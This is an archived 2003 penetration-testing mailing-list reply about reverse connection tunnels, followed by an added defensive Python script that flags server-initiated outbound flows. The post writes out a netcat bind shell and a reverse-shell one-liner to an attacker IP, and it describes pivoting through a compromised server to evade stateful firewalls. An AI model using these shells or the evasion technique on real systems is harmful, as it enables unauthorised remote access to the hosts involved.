RE: command-line reverse connection tunnel?

From: Steven Gill (gman1120at_private)
Date: Sun Mar 16 2003 - 19:26:33 PST


    Yes, you can use netcat to send a shell back, but it is a pain to use it for 
    port redirection. E.g., for a shell you can:
    
    nc -l -p <port> -e /bin/sh
    
    or
    
    nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235 and have stdin and 
    stdout connected to the above ports respectively.  But we want to use more 
    robust services other than shell, such as getting GUI on Windows via 
    terminal services or other more complex protocols.
    
    Let's take for example a service on a machine that is not NAT'd but a border 
    server we can compromise has access to it.
    
    You can use rinetd, fpipe, stunnel, etc. for forward redirection.  In these 
    cases, there need to be 2 holes punched through on the server, 1 for the 
    shell used to compromise the server (like www or telnet) and then the port 
    for the redirector to listen on.  Revinetd is used for port redirection 
    where the server appears to be the initiator of the connectivity.  You 
    theoretically only need one port open in the forward direction, which is the 
    shell.  All other connectivity is initiated outbound from the server, so a 
    stateful firewall would see the port redirector traffic as NEW in the 
    connection table from the server, allowing us to utilize more liberal rule 
    sets that we know most organizations allow.
    
    Now I know revinetd is not the only thing to use for it.  It was brought to 
    my attention that socat can be used for this, but I wanted a tool that was 
    just used for reverse port forwarding and was intuitive to use.
    
    I hope this answers your question.
    
    Steve
    
    >From: "Filip Maertens" <filipat_private>
    >To: "'Steven Gill'" <gman1120at_private>,<pen-testat_private>
    >Subject: RE: command-line reverse connection tunnel?
    >Date: Sat, 15 Mar 2003 23:57:32 +0100
    >
    > >have successfully tested it in a pen test situation in the lab for doing
    > >reverse connectivity.  I think this would be a valuable tool for all people
    >
    >I beg to differ.
    >
    >What exactly is different from using netcat listeners on both,
    >attack-client and target machine?  All in all, using a reverse telnet
    >technique using netcat isn't very much of a big issue?  I think this is
    >a handy tool, but I would like to emphasize one can also use netcat in
    >doing so (if this had been mentioned before in the "old posts",
    >disregard this post, since I didn't follow this thread).
    >
    >
    >Fil
    >
    >--
    >Filip Maertens @ Home
    >http://www.compsec.be
    >
    >
    >----------------------------------------------------------------------------
    >Did you know that you have VNC running on your network?
    >Your hacker does. Plug your security holes now!
    >Download a free 15-day trial of VAM:
    >http://www2.stillsecure.com/download/sf_vuln_list.html
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Mon Mar 17 2003 - 08:31:53 PST
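The thread's observation that a stateful firewall records the redirector's traffic as a NEW connection initiated by the server points at the matching control: review server-initiated outbound flows against an egress allow-list. The following is an added example, not code from the original post or from revinetd; the conntrack-style log format, the host addresses, the allow-list and the sample lines are all constructed.

```python
import ipaddress

# Constructed values (not from the post): DMZ servers that should only accept
# connections, the internal networks, and the few external destinations a
# server may legitimately initiate connections to.
SERVERS = {"10.0.0.10", "10.0.0.11"}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
EGRESS_ALLOW = {("198.51.100.53", 53), ("198.51.100.80", 443)}

def parse_line(line):
    """Parse a constructed conntrack-style line
    '<epoch> NEW <proto> src=<ip> sport=<n> dst=<ip> dport=<n>'; None if not NEW."""
    parts = line.split()
    if len(parts) < 7 or parts[1] != "NEW":
        return None
    try:
        kv = dict(p.split("=", 1) for p in parts[3:7])
        return {"ts": int(parts[0]), "proto": parts[2],
                "src": str(ipaddress.ip_address(kv["src"])), "sport": int(kv["sport"]),
                "dst": str(ipaddress.ip_address(kv["dst"])), "dport": int(kv["dport"])}
    except (KeyError, ValueError):
        return None

def flag_server_egress(lines):
    """Return (src, dst, dport) for every NEW flow a server itself initiated to an
    external destination outside the allow-list: the firewall records the server
    as initiator, which is what makes outbound-initiated redirection detectable."""
    flagged = []
    for line in lines:
        flow = parse_line(line)
        if flow is None or flow["src"] not in SERVERS:
            continue  # inbound, non-server, or already-established traffic
        dst = ipaddress.ip_address(flow["dst"])
        if any(dst in net for net in INTERNAL_NETS):
            continue  # internal-to-internal is out of scope here
        if (flow["dst"], flow["dport"]) in EGRESS_ALLOW:
            continue
        flagged.append((flow["src"], flow["dst"], flow["dport"]))
    return flagged

# Constructed sample log; 203.0.113.5 is the external host and 1234 the listener
# port from the thread's netcat example.
SAMPLE_LOG = [
    "1047859200 NEW tcp src=203.0.113.77 sport=51000 dst=10.0.0.10 dport=80",
    "1047859201 NEW udp src=10.0.0.10 sport=40000 dst=198.51.100.53 dport=53",
    "1047859202 NEW tcp src=10.0.0.10 sport=40001 dst=203.0.113.5 dport=443",
    "1047859203 NEW tcp src=10.0.0.10 sport=40002 dst=10.0.1.20 dport=3389",
    "1047859204 NEW tcp src=10.0.0.11 sport=40003 dst=203.0.113.5 dport=1234",
    "1047859205 ESTABLISHED tcp src=10.0.0.11 sport=40003 dst=203.0.113.5 dport=1234",
]
```

Only the two flows the server initiated to the external host are reported; the outbound DNS lookup, the inbound web hit and the internal RDP connection are not. The same list shows why a default-deny egress policy for servers, rather than the liberal outbound rule sets the post relies on, removes the path entirely.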